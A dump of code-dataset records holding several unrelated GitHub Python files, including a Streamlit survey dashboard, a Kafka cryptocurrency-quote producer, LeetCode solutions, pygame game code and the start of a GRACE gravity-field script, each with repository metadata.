Overview\")\nstf_col_01, stf_col_02, stf_col_03, stf_col_04, stf_col_05 = st.columns(5)\nstf_col_01.metric(\n \"Responses\", int(df_feedback['response_id'].max())\n)\nstf_col_02.metric(\n \"Average Feedback\", \n f'{feedback_lib.feedback_all_mean(df_feedback)}',\n \"Out of 5.0\",\n \"off\"\n)\nstf_col_03.metric(\n \"Positive Feedback\", \n f\"{feedback_lib.feedback_all_nps_percentages(df_feedback, 'positive')}%\",\n \"Score 4+\",\n \"off\"\n)\nstf_col_04.metric(\n \"Neutral Feedback\", \n f\"{feedback_lib.feedback_all_nps_percentages(df_feedback, 'neutral')}%\",\n \"Score 3-4\",\n \"off\"\n)\nstf_col_05.metric(\n \"Negative Feedback\", \n f\"{feedback_lib.feedback_all_nps_percentages(df_feedback, 'negative')}%\",\n \"Score 1-3\",\n \"off\"\n)\n\n## SPACER\nst.write(\"#\")\n\n## Feedback Questions\nst.subheader('Feedback Questions - Categories')\nst.markdown(\n \"Questions and mapping to question categories are shown below\"\n)\nmapping_style = df_mapping.style.hide_index()\nst.write(mapping_style.to_html(), unsafe_allow_html=True)\n\n## SPACER\nst.write(\"#\")\n### Navigation\ntab1, tab2, tab3 = st.tabs([\"Feedback Score Summary\", \"Feedback Score by Building\", \"Feedback Topics\"])\n\n### Tab 01 - Summary\nwith tab1:\n st.header(\"Average Feedback Scores\")\n df_plot = feedback_lib.feedback_questions_average(df_feedback)\n df_plot = create_colour_conditions(df_plot)\n fig = px.bar(\n df_plot,\n y = \"question_category\",\n x = \"feedback_score\",\n title = \"Questions - Average Feedback\",\n color = 'feedback_colour',\n log_y = False,\n orientation = 'h'\n )\n fig.update_layout(\n showlegend = False,\n yaxis_title = None,\n xaxis_title = \"Feedback Score (Average)\",\n yaxis = {\"categoryorder\": \"category descending\"},\n plot_bgcolor = colour_palette['background'],\n margin = dict(l = 200),\n xaxis_range=[1,5]\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n\n ## Question Feedback Breakdown\n st.write('')\n st.subheader('Breakdown of Feedback - Positive and Negative Question Feedback')\n st.write('Note: Feedback here also takes into account the fre-text feedback (the sentiment of those answers). The higher the value, the more overall positive responses there were. The more negative the value, the more overall negative responses there were.')\n ## Overall breakdown - positive vs negative\n df_fb = google_sheets.load_sentiment_data()\n df_fb_positive = (\n df_fb[df_fb[\"sentiment\"] == \"positive\"]\n .groupby([\"feedback_category\", \"sentiment\"])\n .size()\n .reset_index(name=\"counts\")\n .rename(columns={\"index\": \"positive\"})\n )\n df_fb_negative = (\n df_fb[df_fb[\"sentiment\"] == \"negative\"]\n .groupby([\"feedback_category\", \"sentiment\"])\n .size()\n .reset_index(name=\"counts\")\n .rename(columns={\"index\": \"negative\"})\n )\n df_fb_negative[\"counts\"] *= -1\n fig = make_subplots(\n rows=1, cols=2, specs=[[{}, {}]], shared_yaxes=True, horizontal_spacing=0\n )\n fig.append_trace(\n go.Bar(\n x=df_fb_negative.counts,\n y=df_fb_negative.feedback_category,\n orientation=\"h\",\n showlegend=True,\n #text=df_fb_negative.counts,\n name=\"Negative Feedback\",\n marker_color=\"#b20710\",\n ),\n 1,\n 1,\n )\n fig.append_trace(\n go.Bar(\n x=df_fb_positive.counts,\n y=df_fb_positive.feedback_category,\n orientation=\"h\",\n showlegend=True,\n #text=df_fb_positive.counts,\n name=\"Positive Feedback\",\n marker_color=\"green\",\n ),\n 1,\n 2,\n )\n fig.update_layout(\n plot_bgcolor=colour_palette[\"background\"],\n margin=dict(l=200),\n )\n fig.update_xaxes(showgrid=False)\n fig.update_yaxes(\n showgrid=False, categoryorder=\"total ascending\", ticksuffix=\" \", showline=False\n )\n fig.update_traces(textposition=\"auto\")\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n\ndef set_color(row):\n if row[\"feedback_score\"] < 3:\n return \"negative\"\n elif row[\"feedback_score\"] > 4:\n return \"positive\"\n else:\n return \"neutral\"\n\n### Loop and plot\n# SPACER\nwith tab2:\n st.header(\"Average Feedback Score - Split By Building\")\n list_building_name = list(df_feedback['building_name'].drop_duplicates())\n for building in list_building_name:\n df_feedback_filtered = df_feedback[df_feedback['building_name'] == building]\n st.write(\"#\")\n st.subheader(f\"Average Feedback Score - {building}\")\n df_plot_filtered = feedback_lib.feedback_questions_average(df_feedback_filtered)\n df_plot_filtered = df_plot_filtered[['question_category','feedback_score']]\n df_plot_filtered = df_plot_filtered.astype({'feedback_score': 'float'})\n #df_plot_filtered = create_colour_conditions(df_plot_filtered)\n df_plot_filtered = df_plot_filtered.assign(feedback_colour=df_plot_filtered.apply(set_color, axis=1))\n \n fig = px.bar(\n df_plot_filtered,\n y = \"question_category\",\n x = \"feedback_score\",\n color = \"feedback_colour\",\n title = f\"Questions - Average Feedback ({building})\",\n log_y = False,\n orientation = 'h',\n color_discrete_map= {\n 'negative': '#c0392b',\n 'neutral': '#2980b9',\n 'positive': '#27ae60'\n }\n )\n fig.update_layout(\n showlegend = False,\n yaxis_title = None,\n xaxis_title = \"Feedback Score (Average)\",\n yaxis = {\"categoryorder\": \"category descending\"},\n plot_bgcolor = colour_palette['background'],\n margin = dict(l = 200),\n xaxis_range=[1,5]\n )\n fig.update_xaxes(showgrid = False)\n fig.update_yaxes(showgrid = False)\n st.plotly_chart(fig, use_container_width=True, theme=theme_plotly)\n \n## Topics\nwith tab3:\n st.header(\"Free Text Feedback - Topic Modelling\")\n st.write(\"#\")\n st.write(\"Topic modelling is generated from the free-text feedback for each question category.\")\n st.write(\"If a question category is not present, that means not enough feedback was received to generate topics.\")\n st.write(\"A maximum of 5 topics can be generated for each category.\")\n st.write(\"Each topic is broken down into the top words of that topic.\")\n st.write(\"#\")\n st.subheader(\"Topics Summary: All feedback\")\n df_topics_all = df_topics[df_topics['feedback_category'] == 'All']\n list_topics_all = list(set(df_topics_all['topic']))\n list_topics_all.sort()\n for topics_all in list_topics_all:\n tmp_topics = ', '.join(list(df_topics_all['word'][df_topics_all['topic'] == topics_all]))\n st.write(f'{topics_all}: {tmp_topics}')\n st.write(\"#\")\n feedback_cat_list = list(set(df_topics['feedback_category']))\n feedback_cat_list = [x for x in feedback_cat_list if x != 'All']\n for feed_cat in feedback_cat_list:\n st.subheader(f\"Topics Summary: {feed_cat}\")\n df_topics_feed = df_topics[df_topics['feedback_category'] == feed_cat]\n list_topics_feed = list(set(df_topics_feed['topic']))\n list_topics_feed.sort()\n for topics_feed in list_topics_feed:\n tmp_topics = ', '.join(list(df_topics_feed['word'][df_topics_feed['topic'] == topics_feed]))\n st.write(f'{topics_feed}: {tmp_topics}')\n\n## Add Footer\nadd_footer()", "repo_name": "seanaller/interactive-rigra-survey-data-app", "sub_path": "pages/1_Survey_Summary.py", "file_name": "1_Survey_Summary.py", "file_ext": "py", "file_size_in_byte": 12499, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "streamlit.set_page_config", "line_number": 30, "usage_type": "call"}, {"api_name": "data_sources.google_sheets.load_summary_data", "line_number": 33, "usage_type": "call"}, {"api_name": "data_sources.google_sheets", "line_number": 33, "usage_type": "name"}, {"api_name": "data_sources.google_sheets.load_feedback_data", "line_number": 34, "usage_type": "call"}, {"api_name": "data_sources.google_sheets", "line_number": 34, "usage_type": "name"}, {"api_name": "data_sources.google_sheets.load_topic_data", "line_number": 38, "usage_type": "call"}, {"api_name": "data_sources.google_sheets", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 44, "usage_type": "name"}, {"api_name": "streamlit.columns", "line_number": 45, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 47, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 49, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.select", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 69, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 81, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 83, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 86, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 87, "usage_type": "call"}, {"api_name": "src.summary_lib.metric_residents_all", "line_number": 88, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 88, "usage_type": "name"}, {"api_name": "src.summary_lib.metric_residents_contactable", "line_number": 90, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 90, "usage_type": "name"}, {"api_name": "src.summary_lib.metric_residents_leaseholder", "line_number": 93, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 93, "usage_type": "name"}, {"api_name": "src.summary_lib.metric_residents_nonresident_leaseholder", "line_number": 95, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 95, "usage_type": "name"}, {"api_name": "src.summary_lib.metric_residents_tenant", "line_number": 96, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 96, "usage_type": "name"}, {"api_name": "streamlit.write", "line_number": 97, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 98, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 101, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 101, "usage_type": "name"}, {"api_name": "src.summary_lib.filter_summary_data", "line_number": 102, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 102, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 113, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 117, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 119, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 119, "usage_type": "name"}, {"api_name": "src.summary_lib.filter_summary_data", "line_number": 120, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 120, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 131, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 135, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 139, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 139, "usage_type": "name"}, {"api_name": "src.summary_lib.filter_summary_data", "line_number": 140, "usage_type": "call"}, {"api_name": "src.summary_lib", "line_number": 140, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 151, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 155, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 156, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 160, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 161, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 162, "usage_type": "call"}, {"api_name": "src.feedback_lib.feedback_all_mean", "line_number": 168, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 168, "usage_type": "name"}, {"api_name": "src.feedback_lib.feedback_all_nps_percentages", "line_number": 174, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 174, "usage_type": "name"}, {"api_name": "src.feedback_lib.feedback_all_nps_percentages", "line_number": 180, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 180, "usage_type": "name"}, {"api_name": "src.feedback_lib.feedback_all_nps_percentages", "line_number": 186, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 186, "usage_type": "name"}, {"api_name": "streamlit.write", "line_number": 192, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 195, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 196, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 200, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 203, "usage_type": "call"}, {"api_name": "streamlit.tabs", "line_number": 205, "usage_type": "call"}, {"api_name": "streamlit.header", "line_number": 209, "usage_type": "call"}, {"api_name": "src.feedback_lib.feedback_questions_average", "line_number": 210, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 210, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 212, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 212, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 226, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 232, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 235, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 236, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 237, "usage_type": "call"}, {"api_name": "data_sources.google_sheets.load_sentiment_data", "line_number": 239, "usage_type": "call"}, {"api_name": "data_sources.google_sheets", "line_number": 239, "usage_type": "name"}, {"api_name": "plotly.subplots.make_subplots", "line_number": 255, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 259, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 259, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 272, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 272, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 285, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 293, "usage_type": "call"}, {"api_name": "streamlit.header", "line_number": 306, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 310, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 311, "usage_type": "call"}, {"api_name": "src.feedback_lib.feedback_questions_average", "line_number": 312, "usage_type": "call"}, {"api_name": "src.feedback_lib", "line_number": 312, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 318, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 318, "usage_type": "name"}, {"api_name": "src.resources.colour_palette", "line_number": 337, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 343, "usage_type": "call"}, {"api_name": "streamlit.header", "line_number": 347, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 348, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 349, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 350, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 351, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 352, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 353, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 354, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 360, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 361, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 365, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 371, "usage_type": "call"}, {"api_name": "src.util.add_footer", "line_number": 374, "usage_type": "call"}]} +{"seq_id": "8401654080", "text": "from argparse import ArgumentParser\n\n\ndef create_parser():\n \"\"\"Create argument parser of the script.\n\n Returns\n -------\n p : argparse.ArgumentParser\n Parser of the script.\n \"\"\"\n p = ArgumentParser(\n description=\"Map a source dataset to a target dataset \"\n \"given a mapping file in JSON format generated by the \"\n \"MIP Dataset Mapper UI application (mip_dataset_mapper_ui).\"\n )\n p.add_argument(\n \"--source_dataset\",\n required=True,\n help=\"Source dataset file in CSV format.\",\n )\n p.add_argument(\n \"--mapping_file\",\n required=True,\n help=\"Source Dataset Columns / Common data elements (CDEs) mapping file in JSON format. \"\n \"The mapping file can be generated by the MIP Dataset Mapper UI application.\",\n )\n p.add_argument(\n \"--cdes_file\",\n required=True,\n help=\"Common data elements (CDEs) metadata schema file in EXCEL format. \",\n )\n p.add_argument(\n \"--target_dataset\",\n required=True,\n help=\"Path to the target / output dataset file in CSV format.\",\n )\n # p.add_argument(\n # \"--log_file\",\n # required=False,\n # default=None,\n # help=\"Path to output log file. \"\n # \"If not provided, the log file will be saved in the same directory \"\n # \"as the source dataset file with the name `dataset_mapping.log`.\",\n # )\n return p\n", "repo_name": "HBPMedical/mip-dmp", "sub_path": "mip_dmp/utils/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "6927639078", "text": "\"\"\"\r\nKafka Producer\r\n1. Make API calls to fetch cryptocurrency quotes\r\n2. Clean response and structure it as a list of dictionaries\r\n3. Write to kafka topic\r\n\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nfrom kafka import KafkaConsumer, KafkaProducer\r\nfrom time import sleep\r\nfrom json import dumps \r\nimport json\r\nimport time\r\n\r\nfrom requests import Request, Session\r\nfrom requests.exceptions import ConnectionError, Timeout, TooManyRedirects\r\nimport json\r\n\r\n\r\ndef key_serializer(key):\r\n return str(key).encode()\r\n\r\ndef value_serializer(value):\r\n return json.dumps(value).encode()\r\n\r\n\r\n#Call the api with argument n_calls, which specifies how many coins you want to quote\r\ndef call_api(num_coins = 1):\r\n #print(n_calls)\r\n url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest'\r\n parameters = {\r\n 'start':'1',\r\n 'limit':str(num_coins),# MAX = 100 \r\n 'convert':'USD'\r\n }\r\n headers = {\r\n 'Accepts': 'application/json',\r\n 'X-CMC_PRO_API_KEY': '',\r\n }\r\n session = Session()\r\n session.headers.update(headers)\r\n try:\r\n response = session.get(url, params=parameters)\r\n data = json.loads(response.text)\r\n \r\n except (ConnectionError, Timeout, TooManyRedirects) as e:\r\n print(e)\r\n data = None\r\n return data\r\n\r\n#Function 2: Make n number of api calls and extract the desired contents of response\r\ndef fetch_btc_data(num_coins):\r\n data = call_api(num_coins)\r\n if data != None:\r\n quote_key_list = ['volume_24h','volume_change_24h','percent_change_1h','percent_change_24h','percent_change_7d','market_cap_dominance','last_updated']\r\n main_dict = {}\r\n #iterate through all coins that were requested in the api call\r\n for i in range(len(data['data'])):\r\n coin_name = data['data'][i]['name']\r\n coin_quote = data['data'][i]['quote']['USD']\r\n filtered_quote = {key: coin_quote[key] for key in quote_key_list if key in coin_quote} #filter out the specific key value pairs that you want\r\n filtered_quote['Coin'] = coin_name\r\n main_dict[coin_name] = filtered_quote\r\n return main_dict\r\n else:\r\n print(\"Error with API call\")\r\n return None\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\nbootstrap_server_ip= 'ec2-__-___-114-23.compute-1.amazonaws.com'\r\nkafka_topic = 'trial'\r\n\r\n#Step 1: Create a kafka producer\r\nproducer = KafkaProducer(bootstrap_servers=[bootstrap_server_ip], #change ip here\r\n value_serializer=lambda x: dumps(x).encode('utf-8'))\r\n # convert x to json and then serialized to utf-8 because Kafka stores and transmits messages as byte arrays\r\n\r\n#this can be orchestrated with airflow or any work orchestration tool\r\n#Define how many calls to be made, number of coins to quote, delay in seconds\r\n#Write the cleaned response to the kafka topic\r\ndef generate_quotes_send_s3(num_calls, num_coins,delay):\r\n for i in range(num_calls):\r\n producer.send(kafka_topic, value=fetch_btc_data(num_coins))\r\n time.sleep(delay)\r\n\r\ngenerate_quotes_send_s3(10,5,30)", "repo_name": "NpEric360/Realtime_ETL_Pipeline", "sub_path": "producer.py", "file_name": "producer.py", "file_ext": "py", "file_size_in_byte": 3085, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.exceptions.ConnectionError", "line_number": 48, "usage_type": "name"}, {"api_name": "requests.exceptions.Timeout", "line_number": 48, "usage_type": "name"}, {"api_name": "requests.exceptions.TooManyRedirects", "line_number": 48, "usage_type": "name"}, {"api_name": "kafka.KafkaProducer", "line_number": 82, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 83, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "28020321732", "text": "import sortedcontainers\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n q = deque()\n ret = []\n for i, num in enumerate(nums):\n while len(q) and num >= q[-1][0]:\n q.pop()\n q.append((num, i))\n if i >= k-1:\n ret.append(q[0][0])\n if i-k+1 == q[0][1]:\n q.popleft()\n return ret\n\n\nclass Solution2:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n d = sortedcontainers.SortedDict()\n ret = []\n for num in nums[:k-1]:\n d[num] = d.setdefault(num, 0) + 1\n for i, num in enumerate(nums[k-1:]):\n d[num] = d.setdefault(num, 0) + 1\n ret.append(d.peekitem()[0])\n if d[nums[i]] == 1:\n del d[nums[i]]\n else:\n d[nums[i]] -= 1\n return ret\n", "repo_name": "balwierz/LeetCode", "sub_path": "239 Sliding Window Maximum.py", "file_name": "239 Sliding Window Maximum.py", "file_ext": "py", "file_size_in_byte": 924, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sortedcontainers.SortedDict", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "34657011804", "text": "import random\nimport pygame\nimport tile_classes\nimport variables\n\nclass island():\n\t__slots__ = (\"surf\", \"underground\", \"top\", \"top_c\")\n\n\tdef __init__(self, size, surf_height):\n\t\tstart = random.randint(3, int(size * 0.15))\n\t\tend = random.randint(int(size * 0.85), size - 2)\n\t\tself.surf = [[x, surf_height] for x in range(start, end)]\n\t\tself.underground = []\n\t\tunderground = [[x, surf_height + 1] for x in range(start, end)]\n\t\tfor i in range(4):\n\t\t\tself.underground += [[x, y + i] for x, y in underground]\n\t\t\ttry:\n\t\t\t\tdel underground[0:random.randint(1, 4)]\n\t\t\t\tl = len(underground)\n\t\t\t\tdel underground[-random.randint(1, 4):-1]\n\t\t\t\tdel underground[-1]\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\tbackup = self.surf[1:]\n\t\tself.top = []\n\t\tfor i in range(random.randint(5, 8)):\n\t\t\ttile = random.choice(backup)\n\t\t\tself.top.append([tile_classes.create_class(\"trees\", tile, 0)])\n\t\t\tbackup.remove(tile)\n\t\tfor i in range(random.randint(2, 3)):\n\t\t\ttile = random.choice(backup)\n\t\t\tself.top.append([tile_classes.create_class(\"rocks\", tile, 0)])\n\t\t\tbackup.remove(tile)\n\t\tfor i in range(random.randint(1, 2)):\n\t\t\ttile = random.choice(backup)\n\t\t\tself.top.append([tile_classes.create_class(\"ruins\", tile, 0)])\n\t\t\tbackup.remove(tile)\n\t\tfor tile in backup:\n\t\t\tself.top.append([tile_classes.create_class(\"grass\", tile, 0)])\n\t\tself.top.append([tile_classes.create_class(\"ship\", [self.surf[0][0], self.surf[0][1]], 0)])\n\n\tdef draw_island(self, t_size, window):\n\t\tfor su in self.surf:\n\t\t\tpygame.draw.rect(window, (variables.grass_green), (su[0] * t_size, su[1] * t_size, t_size, t_size))\n\n\t\tfor un in self.underground:\n\t\t\tpygame.draw.rect(window, (variables.rock_grey), (un[0] * t_size, un[1] * t_size, t_size, t_size))\n\n\t\tfor tower in self.top:\n\t\t\tfor tile in tower:\n\t\t\t\tif tile.image != None:\n\t\t\t\t\twindow.blit(tile.image, (tile.coords[0] * t_size, (tile.coords[1] - 1) * t_size))", "repo_name": "4b3c/floating_island_game", "sub_path": "island.py", "file_name": "island.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randint", "line_number": 10, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 11, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 20, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 28, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 32, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 33, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 36, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 37, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 40, "usage_type": "call"}, {"api_name": "tile_classes.create_class", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 45, "usage_type": "attribute"}, {"api_name": "variables.grass_green", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 48, "usage_type": "attribute"}, {"api_name": "variables.rock_grey", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "30098801431", "text": "import pygame, random, os\nfrom card import Card\n\nimages = os.listdir('emojis')\n\ndef _get_random_emoji():\n emoji = images.pop(random.randint(0, len(images)-1))\n return os.path.join('emojis', emoji)\n\ndef _resize_surface(surface, mult):\n new_size = (int(surface.get_width()*mult), int(surface.get_height()*mult))\n return pygame.transform.scale(surface, new_size)\n\ndef _get_empty_matrix():\n matrix = []\n for i in range(4):\n matrix.append([])\n for j in range(4):\n matrix[i].append(0)\n return matrix\n\ndef get_random_game_grid(surface_size):\n matrix = _get_empty_matrix()\n\n # Create a list with 8 pairs of emojis. For a total of 16 emojis for the 4x4 grid.\n emojis = []\n for i in range(8):\n\n random_emoji = _get_random_emoji()\n emojis.append(random_emoji)\n emojis.append(random_emoji)\n random.shuffle(emojis)\n \n\n # Fill matrix with cards that have emojis and rects\n # Each loop it pops an emoji from the shuffled emoji list\n eigths = [surface_size*1/8, surface_size*3/8, surface_size*5/8, surface_size*7/8]\n \n for y, i in zip(range(4), eigths):\n for x, j in zip(range(4), eigths):\n emoji_name = emojis.pop()\n emoji_surface = pygame.image.load(emoji_name)\n emoji_surface.convert_alpha()\n emoji_surface = _resize_surface(emoji_surface, 0.27)\n\n rect = pygame.Rect(0, 0, 130, 130)\n rect.center = (i, j)\n \n matrix[y][x] = Card(emoji_surface, rect, emoji_name)\n\n return(matrix)", "repo_name": "lucasfstmd/CC-UEPB", "sub_path": "1° Periodo/Algoritimos/Trabalho 1/combinar_pares 0.2/game_grid_generator.py", "file_name": "game_grid_generator.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 4, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 12, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 46, "usage_type": "call"}, {"api_name": "card.Card", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "10782078119", "text": "#!/usr/local/bin/python3\n\n'''\nCalculating the Equivalent Water Height (EWH) due to gravity change between \ntwo GRACE monthly solutions. This example calculates the EWH from gravity\nchange between May 2002 and May 2017 for Greenland using the ITSG-GRACE2016 \ngravity field. Spatial averaging using a Gaussian filter is used for \ndestriping. See also: \nWahr, J. (2015): Time Variable Gravity Fields from Satellites. In: Herring, \nT.A. (Ed.): Treatise on Geophysics, Vol 3, pp 193-213.\n\nThis example does NOT include corrections for additional gravity effects,\ne.g., GIA or leakage. \n\nThe intend of this demo is solely to give an example of the evaluation of \ngravity field solutions provided in spherical harmonic coefficients.\n\nFor other locations change the variables lat and lon, where the latitude is\nthe polar distance, or colatitude, ranging from 0° to 180°. For other Epochs \nchange file1 and file 2. \n\nITSG-GRACE2016 Reference: \nMayer-Gürr, Torsten; Behzadpour, Saniya; Ellmer, Matthias; Kvas, Andreas; \nKlinger, Beate; Zehentner, Norbert (2016): ITSG-Grace2016 - Monthly and Daily \nGravity Field Solutions from GRACE. GFZ Data Services. \nhttp://doi.org/10.5880/icgem.2016.007\n\nPlotting of the results requires the cartopy package. See documentation at\nhttps://scitools.org.uk/cartopy/docs/latest/index.html\nCartopy will download the necessary coastlines\n'''\n\nimport numpy as np\nimport multiprocessing as mp\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\nimport pyfunc.plot_grav_field_libs as pgfl\nfrom cartopy import crs as ccrs\nfrom cartopy.mpl.gridliner import LatitudeFormatter , LongitudeFormatter\n\ndef ewh_calc():\n p = mp.Pool(mp.cpu_count())\n res=[p.apply_async(pgfl.waterheight, args = (rlam, ele , dc, ds, deg_max,lf,kn)) \n for ele in rlat \n ]\n p.close()\n p.join()\n ewh=np.zeros((len(rlat),len(rlam)+1))\n for hi in range(0,len(rlat)):\n ewh[hi,:] = res[hi].get()\n ewh= ewh[ewh[:,0].argsort()]\n ewh=np.delete(ewh, np.s_[0], axis=1)\n return ewh\n\n# define common parameters\ndeg_max = 90\ndeg_list = np.arange(2, deg_max+1, 1) # from degree 2 to deg_max\nR=6378.136 # Earth radius in km \nfilterradius = 300.0 # filter radius in km; 